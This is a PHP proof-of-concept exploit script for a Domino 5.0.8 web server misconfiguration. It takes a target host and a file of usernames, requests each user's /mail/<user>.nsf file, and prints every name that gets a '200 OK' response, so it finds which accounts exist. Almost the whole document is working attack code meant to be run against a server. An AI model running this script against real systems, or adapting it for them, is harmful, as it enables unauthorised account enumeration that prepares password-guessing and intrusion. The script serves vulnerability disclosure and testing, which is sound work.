#!/usr/local/bin/php -q
<?
/*
Proof of Concepts Domino 5.0.8 webserver misconfiguration which could
allow
remote users to determine whether a give username exists on the
vulnerable
system.
By Gabriel A Maggiotti <gmaggiot@ciudad.com.ar>
<gmaggiot@qb0x.net>
URL http://qb0x.net
*/
if( $argc!=4)
{
echo "usage: $argv[0] <host> <userlist> <delay>\n";
return 1;
}
$host=$argv[1];
$userlist=$argv[2];
$fd = fopen ($userlist, "r");
while (!feof ($fd)) {
$user = fgets($fd, 4096);
$fp = fsockopen ($host, 80 , &$errno, &$errstr, 30);
fputs ($fp, "GET /mail/$user.nsf HTTP/1.0\r\n\r\n");
while (!feof ($fp)) {
$sniff=fgets($fp,1024);
if(strpos($sniff,"200 OK")!="") {
echo "$user exists!!!\n";
break;
}
}
fclose ($fp);
sleep(3);
}
fclose ($fd);
?>
